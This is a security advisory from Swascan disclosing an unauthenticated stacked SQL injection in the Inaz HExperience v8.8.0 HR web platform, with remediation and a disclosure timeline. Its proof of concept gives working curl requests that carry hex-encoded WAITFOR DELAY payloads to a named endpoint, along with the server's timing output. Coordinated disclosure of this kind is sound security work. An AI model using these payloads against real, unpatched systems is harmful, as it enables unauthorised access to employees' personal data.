Security Advisory: Inaz Comunication System HEXPERIENCE v8.8.0

Swascan Offensive Security Team has identified 1 vulnerability on Inaz HExperience v8.8.0 application. The vulnerability has been fixed in version 8.9.0.

INAZ

INAZ is the Italian company specialized in software and solutions for administering, managing and organizing work.

It designs, manufactures and markets products, tools and services and continues to do research and innovation, collaborates with universities, promotes partnerships with companies that develop original and new products.

Product description

Inaz HExperience is the HR platform is a web-based application integrates and streamlines solutions, tools and information to help everyone work better. It makes talent management, cooperation and innovative types of organisation easier. The HExperience platform is a powerful database with all the operating modules you need.

Technical summary

Swascan Offensive Security Team found an important vulnerability on: Inaz HExperience v8.8.0:

VulnerabilityCVSSv3.1CVSSv3.1 Base Vector
Unauthenticated Stacked SQL injection9.8 – CriticalAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

In the following section we provide technical details about this vulnerability, including evidence and a proof-of-concept. This vulnerability can affect hundreds of Internet-connected devices.

Description

In Inaz  HExperience Product version 8.8.0, an attacker will be able to remotely access the information contained in the database and carry out operations such as exfiltration and modification of user and administrative accounts, users personal information (PII) and more, without the need of authentication.

Proof of Concept

The following POC shows how to trigger a Stacked SQL Injection on Microsoft SQL Server with the time-based technique:

$ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc= 31273b57414954464f522044454c41592027303a303a35272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto &#39;UserHR.cand_est&#39; non &#232; valido.<br><br>SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = &#39;1&#39;;WAITFOR DELAY &#39;0:0:5&#39;--&#39;

real	0m5,649s
user	0m0,026s
sys	0m0,000s

$ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc= 31273b57414954464f522044454c41592027303a303a3130272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto &#39;UserHR.cand_est&#39; non &#232; valido.<br><br>SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = &#39;1&#39;;WAITFOR DELAY &#39;0:0:10&#39;--&#39;

real	0m10,655s
user	0m0,019s
sys	0m0,005s

$ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc=31273b57414954464f522044454c41592027303a303a3135272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto &#39;UserHR.cand_est&#39; non &#232; valido.<br><br>SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = &#39;1&#39;;WAITFOR DELAY &#39;0:0:15&#39;--&#39;

real	0m15,819s
user	0m0,021s
sys	0m0,009s

Impact

If correctly expoited, this vulnerability could lead to acquire local Administrator rights, resulting in access to all the portal features. In some cases it could be possible to execute commands on the remote OS.

Remediation

Upgrade INAZ HEXPERIENCE to version 8.9.0.

Disclosure Timeline

  • 07-04-2022: Vulnerabilities discovered
  • 07-04-2022: INAZ contacted by email (1st time, no reply)
  • 15-04-2022: INAZ contacted by email (2nd time, reply)
  • 20-04-2022: INAZ ask for a technical in-depth analysis
  • 27-04-2022: Videocall for technical in-depth analysis
  • 23-05-2022: INAZ release a patch (new HEXPERIENCE v8.9.0)
  • 30-06-2022: Swascan send a draft of Security Advisory

Sources and references

https://cwe.mitre.org/data/definitions/89.html

https://www.owasp.org/index.php/SQL_Injection

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.md

https://owasp.org/Top10/A03_2021-Injection/

Swascan uncovers Huawei 's vulnerabilities
Swascan discovers vulnerabilities on SAP’s Web Applications

Cyber Incident Swascan Emergency

Contact us for immediate support

The undersigned, as data subject, DECLARES that I have read and understood the content of the privacy policy pursuant to Article 13, GDPR. AGREE to the processing of data in relation to the sending by the Data Controller of commercial and / or promotional communications relating to (i) own products / services, or (ii) products / services offered by third parties.
The consent given may be revoked at any time by contacting the Data Controller at the addresses provided in the aforementioned privacy policy.